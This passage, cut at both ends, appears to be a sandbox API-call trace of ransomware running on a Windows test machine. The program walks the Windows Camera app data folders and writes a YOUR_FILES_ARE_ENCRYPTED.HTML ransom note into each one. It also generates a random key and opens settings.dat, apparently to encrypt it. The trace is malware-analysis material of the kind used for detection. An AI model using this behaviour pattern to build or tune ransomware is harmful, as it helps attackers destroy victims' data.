returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\Microsoft.WindowsCamera_2015.1071.40.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat" [0120.117] CreateIoCompletionPort (FileHandle=0x324, ExistingCompletionPort=0x274, CompletionKey=0x670340, NumberOfConcurrentThreads=0x0) returned 0x274 [0120.117] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x670340, lpOverlapped=0x670340) returned 1 [0120.117] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1b3b0f8a, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x1b3b0f8a, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x1b3b0f8a, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x6000, dwReserved0=0x6b4210, dwReserved1=0x6dace0, cFileName="ActivationStore.dat.LOG1", cAlternateFileName="ACTIVA~1.LOG")) returned 1 [0120.117] StrStrIW (lpFirst="ActivationStore.dat.LOG1", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.117] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\Microsoft.WindowsCamera_2015.1071.40.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat.LOG1") returned 185 [0120.117] PathFindExtensionW (pszPath="ActivationStore.dat.LOG1") returned=".LOG1" [0120.118] lstrlenW (lpString=".LOG1") returned 5 [0120.118] PathFindExtensionW (pszPath="ActivationStore.dat.LOG1") returned=".LOG1" [0120.118] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1b3b0f8a, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x1b3b0f8a, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x1b3b0f8a, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b4210, dwReserved1=0x6dace0, cFileName="ActivationStore.dat.LOG2", cAlternateFileName="ACTIVA~2.LOG")) returned 1 [0120.118] StrStrIW (lpFirst="ActivationStore.dat.LOG2", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.118] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\Microsoft.WindowsCamera_2015.1071.40.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat.LOG2") returned 185 [0120.118] PathFindExtensionW (pszPath="ActivationStore.dat.LOG2") returned=".LOG2" [0120.118] lstrlenW (lpString=".LOG2") returned 5 [0120.118] PathFindExtensionW (pszPath="ActivationStore.dat.LOG2") returned=".LOG2" [0120.118] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1b3b0f8a, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x1b3b0f8a, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x1b3b0f8a, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b4210, dwReserved1=0x6dace0, cFileName="ActivationStore.dat.LOG2", cAlternateFileName="ACTIVA~2.LOG")) returned 0 [0120.118] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0120.118] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\Microsoft.WindowsCamera_2015.1071.40.0_x64__8wekyb3d8bbwe\\ActivationStore\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 190 [0120.118] GetProcessHeap () returned 0x600000 [0120.118] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.118] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\Microsoft.WindowsCamera_2015.1071.40.0_x64__8wekyb3d8bbwe\\ActivationStore\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowscamera_8wekyb3d8bbwe\\microsoft.windowscamera_2015.1071.40.0_x64__8wekyb3d8bbwe\\activationstore\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0120.120] WriteFile (in: hFile=0x320, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0120.121] CloseHandle (hObject=0x320) returned 1 [0120.122] GetProcessHeap () returned 0x600000 [0120.122] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.122] GetProcessHeap () returned 0x600000 [0120.122] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0120.122] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b364b39, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x1b364b39, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x1b3b0f8a, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6dad86, dwReserved1=0x6dacd8, cFileName="ActivationStore", cAlternateFileName="ACTIVA~1")) returned 0 [0120.122] FindClose (in: hFindFile=0x626978 | out: hFindFile=0x626978) returned 1 [0120.122] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\Microsoft.WindowsCamera_2015.1071.40.0_x64__8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 174 [0120.122] GetProcessHeap () returned 0x600000 [0120.122] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.122] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\Microsoft.WindowsCamera_2015.1071.40.0_x64__8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowscamera_8wekyb3d8bbwe\\microsoft.windowscamera_2015.1071.40.0_x64__8wekyb3d8bbwe\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0120.125] WriteFile (in: hFile=0x31c, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0120.126] CloseHandle (hObject=0x31c) returned 1 [0120.126] GetProcessHeap () returned 0x600000 [0120.126] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.126] GetProcessHeap () returned 0x600000 [0120.126] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0120.126] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b01d4e5, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x1b01d4e5, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x1b01d4e5, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="RoamingState", cAlternateFileName="ROAMIN~1")) returned 1 [0120.126] StrStrIW (lpFirst="RoamingState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.126] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\RoamingState") returned 99 [0120.127] GetProcessHeap () returned 0x600000 [0120.127] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0120.127] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\RoamingState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\RoamingState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\RoamingState" [0120.127] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\RoamingState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\RoamingState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\RoamingState\\*" [0120.127] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\RoamingState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b01d4e5, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x1b01d4e5, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x1b01d4e5, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6dad86, dwReserved1=0x6dacd8, cFileName=".", cAlternateFileName="")) returned 0x626638 [0120.127] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b01d4e5, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x1b01d4e5, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x1b01d4e5, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6dad86, dwReserved1=0x6dacd8, cFileName="..", cAlternateFileName="")) returned 1 [0120.127] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b01d4e5, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x1b01d4e5, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x1b01d4e5, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6dad86, dwReserved1=0x6dacd8, cFileName="..", cAlternateFileName="")) returned 0 [0120.127] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0120.127] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\RoamingState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 129 [0120.127] GetProcessHeap () returned 0x600000 [0120.127] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.127] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\RoamingState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowscamera_8wekyb3d8bbwe\\roamingstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0120.128] WriteFile (in: hFile=0x31c, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0120.129] CloseHandle (hObject=0x31c) returned 1 [0120.130] GetProcessHeap () returned 0x600000 [0120.130] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.130] GetProcessHeap () returned 0x600000 [0120.130] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0120.130] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b01d4e5, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x1b04390b, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x1b04390b, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="Settings", cAlternateFileName="")) returned 1 [0120.130] StrStrIW (lpFirst="Settings", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.130] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\Settings") returned 95 [0120.130] GetProcessHeap () returned 0x600000 [0120.130] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0120.130] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\Settings" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\Settings") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\Settings" [0120.130] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\Settings", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\Settings\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\Settings\\*" [0120.130] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\Settings\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b01d4e5, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x1b04390b, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x1b04390b, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6dad86, dwReserved1=0x6dacd8, cFileName=".", cAlternateFileName="")) returned 0x626638 [0120.130] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b01d4e5, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x1b04390b, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x1b04390b, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6dad86, dwReserved1=0x6dacd8, cFileName="..", cAlternateFileName="")) returned 1 [0120.130] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b04390b, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x1b04390b, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x1b04390b, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6dad86, dwReserved1=0x6dacd8, cFileName="roaming.lock", cAlternateFileName="ROAMIN~1.LOC")) returned 1 [0120.131] StrStrIW (lpFirst="roaming.lock", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.131] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\Settings\\roaming.lock") returned 108 [0120.131] PathFindExtensionW (pszPath="roaming.lock") returned=".lock" [0120.131] lstrlenW (lpString=".lock") returned 5 [0120.131] PathFindExtensionW (pszPath="roaming.lock") returned=".lock" [0120.131] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b04390b, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x1b04390b, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x11d3fb2a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x6dad86, dwReserved1=0x6dacd8, cFileName="settings.dat", cAlternateFileName="")) returned 1 [0120.131] StrStrIW (lpFirst="settings.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.131] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\Settings\\settings.dat") returned 108 [0120.131] PathFindExtensionW (pszPath="settings.dat") returned=".dat" [0120.131] lstrlenW (lpString=".dat") returned 4 [0120.131] PathFindExtensionW (pszPath="settings.dat") returned=".dat" [0120.131] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0120.131] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\Settings\\settings.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowscamera_8wekyb3d8bbwe\\settings\\settings.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x320 [0120.132] GetFileSizeEx (in: hFile=0x320, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=8192) returned 1 [0120.132] GetProcessHeap () returned 0x600000 [0120.132] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30a0048 [0120.135] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="3E") returned 2 [0120.135] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="6E") returned 2 [0120.135] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="42") returned 2 [0120.135] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="B9") returned 2 [0120.135] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="01") returned 2 [0120.135] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="C9") returned 2 [0120.135] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="56") returned 2 [0120.135] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="11") returned 2 [0120.135] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="43") returned 2 [0120.136] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="77") returned 2 [0120.136] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="B2") returned 2 [0120.136] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="CC") returned 2 [0120.136] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="86") returned 2 [0120.136] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="12") returned 2 [0120.136] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="0F") returned 2 [0120.136] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="B8") returned 2 [0120.136] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="41") returned 2 [0120.136] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="1A") returned 2 [0120.136] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="FA") returned 2 [0120.136] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="E6") returned 2 [0120.136] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="B6") returned 2 [0120.136] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="F4") returned 2 [0120.136] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="5C") returned 2 [0120.136] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="68") returned 2 [0120.136] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="C5") returned 2 [0120.136] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="D2") returned 2 [0120.136] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="0C") returned 2 [0120.136] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="85") returned 2 [0120.136] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="A1") returned 2 [0120.136] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="3A") returned 2 [0120.136] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="10") returned 2 [0120.136] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="04") returned 2 [0120.137] lstrcpyW (in: lpString1=0x30b00fc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\Settings\\settings.dat" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\Settings\\settings.dat") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\Settings\\settings.dat" [0120.137] CreateIoCompletionPort (FileHandle=0x320, ExistingCompletionPort=0x274, CompletionKey=0x30a0048, NumberOfConcurrentThreads=0x0) returned 0x274 [0120.137] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30a0048, lpOverlapped=0x30a0048) returned 1 [0120.137] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b04390b, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x1b04390b, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x11d3fb2a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x6dad86, dwReserved1=0x6dacd8, cFileName="settings.dat", cAlternateFileName="")) returned 0 [0120.137] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0120.137] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\Settings\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 125 [0120.137] GetProcessHeap () returned 0x600000 [0120.137] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.137] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\Settings\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowscamera_8wekyb3d8bbwe\\settings\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0120.138] WriteFile (in: hFile=0x31c, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0120.142] CloseHandle (hObject=0x31c) returned 1 [0120.142] GetProcessHeap () returned 0x600000 [0120.142] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.142] GetProcessHeap () returned 0x600000 [0120.142] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0120.142] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b04390b, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x1b04390b, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x1b04390b, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="SystemAppData", cAlternateFileName="SYSTEM~1")) returned 1 [0120.142] StrStrIW (lpFirst="SystemAppData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.142] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: 